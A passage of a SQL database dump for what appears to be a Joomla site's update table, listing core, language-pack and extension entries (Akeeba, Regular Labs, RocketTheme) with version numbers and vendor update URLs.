AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22503,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22504,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22505,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22506,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22507,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-0.html',''),(22508,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(22509,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(22510,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(22511,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22512,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22513,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22514,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22515,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-0.html',''),(22516,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22517,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22518,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22519,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22520,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22521,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22522,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22523,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22524,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22525,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22526,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22527,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22528,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22529,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22530,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22531,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22532,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22533,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22534,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22535,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22536,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22537,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22538,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22539,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22540,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22541,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22542,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22543,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22544,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22545,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22546,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22547,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22548,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22549,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22550,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22551,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22552,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22553,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22554,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22555,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22556,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22557,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22558,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22559,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22560,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22561,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22562,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22563,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22564,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22565,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22566,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22567,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22568,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22569,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22570,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22571,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22572,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22573,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22574,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22575,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22576,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22577,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22578,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22579,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22580,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22581,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22582,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22583,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22584,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22585,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22586,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22587,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22588,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22589,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22590,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22591,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22592,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22593,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22594,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22595,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22596,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22597,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22598,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22599,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22600,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22601,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22602,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22603,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22604,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22605,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22606,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22607,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22608,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22609,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22610,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22611,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22612,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22613,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22614,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22615,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22616,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-0.html',''),(22617,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(22618,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(22619,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(22620,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22621,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22622,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-0.html',''),(22623,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22624,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22625,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22626,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-0.html',''),(22627,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22628,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22629,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22630,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22631,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22632,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22633,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22634,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22635,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22636,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22637,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22638,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22639,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22640,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22641,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22642,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22643,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22644,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22645,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22646,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22647,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22648,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22649,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22650,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22651,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22652,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22653,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22654,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22655,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22656,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22657,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22658,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22659,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22660,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22661,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22662,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22663,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22664,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22665,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22666,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22667,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22668,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22669,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22670,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22671,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22672,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22673,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22674,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22675,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22676,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22677,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22678,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(22679,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(22680,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(22681,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(22682,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(22683,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(22684,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(22685,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(22686,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(22687,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22688,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22689,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22690,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22691,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22692,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22693,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22694,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22695,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22696,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22697,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22698,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22699,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22700,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22701,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22702,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22703,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22704,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22705,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22706,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22707,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22708,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22709,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22710,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22711,57,0,'English 